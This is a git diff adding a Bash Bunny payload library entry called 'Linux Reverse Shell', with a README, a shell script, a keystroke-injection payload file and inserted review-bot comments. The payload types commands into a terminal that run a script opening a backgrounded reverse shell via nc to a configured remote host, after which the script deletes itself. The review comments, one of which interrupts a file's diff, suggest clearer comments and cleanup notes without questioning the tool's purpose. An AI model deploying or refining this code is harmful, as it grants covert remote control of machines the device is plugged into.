diff --git a/payloads/library/LinuxReverseShell/README.md b/payloads/library/LinuxReverseShell/README.md
new file mode 100644
index 00000000..c612ca00
--- /dev/null
+++ b/payloads/library/LinuxReverseShell/README.md
@@ -0,0 +1,31 @@
+# Linux Reverse Shell for Bash Bunny
+
+Author: tuzzmaniandevil
+Version: Version 1.0
+
+## Description
+
+With the help of ducky script, it opens a terminal window using `CTRL ALT T`. Once the window is open it will copy the script to a hidden directory in the home directory.
+The script will then be executed which starts a background reverse shell, delete itself and closes the terminal window.
+
+Great when combined with the LAN Turtle :-)
+
+Example listening for the connection on linux:
+`nc -nlvp 4444`
+
+## Configuration
+
+- **RHOST** The host computer to connect to
+- **RPORT** The post to use for the connection
+
+## Requirements
+
+The RHOST pc must be accessible from the target machine
+
+## STATUS
+
+| LED | Status |
+| ---------------- | ------------------------------------- |
+| Red | Setup |
+| Blue (blinking) | Executing Ducky and starting script |
+| Green | Finished |
diff --git a/payloads/library/LinuxReverseShell/a.sh b/payloads/library/LinuxReverseShell/a.sh
new file mode 100644
index 00000000..f2de03d7
--- /dev/null
+++ b/payloads/library/LinuxReverseShell/a.sh
@@ -0,0 +1,10 @@
+#!/bin/bash
+A="$0"
+H=$1
+P=$2
+rm -rf ~/.a/
+mkdir -p ~/.a/
+mknod ~/.a/p p
+/bin/sh -c /bin/sh 0<~/.a/p | nc $H $P 1>~/.a/p &
+disown $!
+rm -f "$A"
diff --git a/payloads/library/LinuxReverseShell/payload.txt b/payloads/library/LinuxReverseShell/payload.txt
new file mode 100644
index 00000000..b62dfde6
--- /dev/null
+++ b/payloads/library/LinuxReverseShell/payload.txt
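Review bot: In a.sh, `rm -rf ~/.a/` runs unconditionally, so any directory of that name already in the user's home is deleted without a check; that is a data-loss risk on the machine under test. The script also has no header comment. The README's "delete itself" covers only the final `rm -f "$A"`, while the `~/.a/` directory, the named pipe `~/.a/p` and the backgrounded `sh`/`nc` pair stay behind. I would add a header such as `# Leaves ~/.a/p (FIFO) and a background sh|nc pair on the host; remove both after the test` so operators know what to clean up and responders know what to look for. `$H` and `$P` are also used unquoted and unvalidated, so a call with missing arguments still reaches `nc`.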
@@ -0,0 +1,49 @@
+#!/bin/bash
+#
+# Title: Linux Reverse Shell
+# Author: tuzzmaniandevil
+# Version: 1.0
+#
+# Runs a script in the background that creates a reverse shell connection to the configured address and then removes itself.
+#
+# Red ...............Setup
+# Blue Blinking......Executing
+# Green..............Finished
+
+# Config options
+RHOST=127.0.0.1
+RPORT=4444
+
+# Start Setup
+LED R
+
+# Set Attack Mode
+ATTACKMODE HID STORAGE
+
+LANGUAGE='us'
+
+# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
+source bunny_helpers.sh
+
+# Wait for Storage to mount
+sleep 5
+
+# Open a terminal
+Q CTRL-ALT t
+
+# Wait for terminal to open
+sleep 1
+LED B 250
+
+# Copy bash script
+Q STRING "cp \$(readlink -f /dev/disk/by-label/BashBunny | while read dev;do mount | grep \"\$dev\b\" | awk '{print \$3}';done)/payloads/"
+Q STRING $SWITCH_POSITION
+Q STRING "/a.sh ~/a.sh && chmod +x ~/a.sh && ~/a.sh $RHOST $RPORT"
+Q ENTER
+
+# Quit the terminal
+LED R G 250
+Q STRING exit
+Q ENTER
+
+LED G
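Review bot: The comments in payload.txt do not match what the typed command does. The README in this commit says the script is copied "to a hidden directory in the home directory", but the `Q STRING` lines copy it to `~/a.sh`, and only a.sh later creates `~/.a/`. I would change `# Copy bash script` to `# Copy a.sh from the mounted Bunny storage to ~/a.sh, then run it with RHOST and RPORT`. The final `LED G` is also unconditional, so "Finished" in the header only means the keystrokes were sent, not that the `cp && chmod && ~/a.sh` chain succeeded; the LED legend should say so, for example `# Green..............Keystrokes sent (success on host not verified)`.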